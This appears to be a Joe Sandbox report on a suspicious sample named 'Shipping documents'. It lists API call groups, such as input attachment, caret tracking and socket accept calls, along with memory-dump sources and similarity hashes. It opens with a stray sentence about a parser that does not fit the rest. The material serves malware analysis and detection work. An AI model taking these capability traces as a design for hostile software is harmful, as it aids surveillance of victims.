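Run against a whole saved report, the same parser yields one record per function; the empty block in the sample shows that entries without imported calls (such as the CRT-internal __flsbuf entry above) parse to an empty record and never fire.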
APIs
• GetForegroundWindow.USER32 ref: 0047439C
  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
• GetCaretPos.USER32(?), ref: 004743B2
• ClientToScreen.USER32(00000000,?), ref: 004743E8
• GetForegroundWindow.USER32 ref: 004743EE
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2759813231-0
                                                                                                          • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                          • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                          • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                          • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                          APIs
                                                                                                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                          • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                                          • _wcslen.LIBCMT ref: 00449519
                                                                                                          • _wcslen.LIBCMT ref: 00449526
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: MessageSend_wcslen$_wcspbrk
• String ID:
• API String ID: 2886238975-0
• Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
• Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
• Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
• Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
APIs
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: __setmode$DebugOutputString_fprintf
• String ID:
• API String ID: 1792727568-0
• Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
• Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
• Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
• Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
APIs
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
• Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
• Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
• Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
• Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
APIs
  • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
  • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
  • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
• lstrlenW.KERNEL32(?), ref: 00434CF6
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
• lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
Strings
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: lstrcmpilstrcpylstrlen$_malloc
• String ID: cdecl
• API String ID: 3850814276-3896280584
• Opcode ID: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
• Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
• Opcode Fuzzy Hash: c1d0e3fd88ced86f6f3832065c3908be80ab03c979ff4d6bcf24e5a7885ffd19
• Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
APIs
  • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
• gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
• WSAGetLastError.WSOCK32(00000000), ref: 0046D439
• _memmove.LIBCMT ref: 0046D475
• inet_ntoa.WSOCK32(?), ref: 0046D481
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 2502553879-0
• Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
• Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
• Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
• Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
APIs
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
• accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
• WSAGetLastError.WSOCK32(00000000), ref: 00458B03
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
• Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
• Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
• Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
• Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                          • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                          • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                          • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                          • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                          • String ID:
                                                                                                          • API String ID: 1358664141-0
                                                                                                          • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                          • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                          • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                          • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                          APIs
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 2880819207-0
                                                                                                          • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                          • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                          • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                          • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                          • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 357397906-0
                                                                                                          • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                          • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                          • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                          • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                          APIs
                                                                                                          • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                          • __wsplitpath.LIBCMT ref: 00433950
                                                                                                          • __wcsicoll.LIBCMT ref: 00433974
                                                                                                          • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                          • String ID:
                                                                                                          • API String ID: 1187119602-0
                                                                                                          • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                          • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                          • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                          • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1597257046-0
                                                                                                          • Opcode ID: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                                                                                                          • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                                          • Opcode Fuzzy Hash: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                                                                                                          • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                                          APIs
                                                                                                          • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                                          • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                          • String ID:
                                                                                                          • API String ID: 237123855-0
                                                                                                          • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                          • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                                          • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                          • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteDestroyObject$IconWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3349847261-0
                                                                                                          • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                          • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                                          • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                          • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
• Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
• Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
• Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
• Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
• LineTo.GDI32(?,?,?), ref: 00447326
• EndPath.GDI32(?), ref: 00447336
• StrokePath.GDI32(?), ref: 00447344
Similarity
• API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
• String ID:
• API String ID: 2783949968-0
• Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
• Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
• Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
• Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
• GetCurrentThreadId.KERNEL32 ref: 004364A3
• AttachThreadInput.USER32(00000000), ref: 004364AA
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
• Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
• Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
• Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
• UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
• CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
  • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
  • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
Similarity
• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
• Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
• Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
• Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
• Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
APIs
• GetDesktopWindow.USER32 ref: 00472B63
• GetDC.USER32(00000000), ref: 00472B6C
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
• ReleaseDC.USER32(00000000,?), ref: 00472B99
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
• Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
• Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
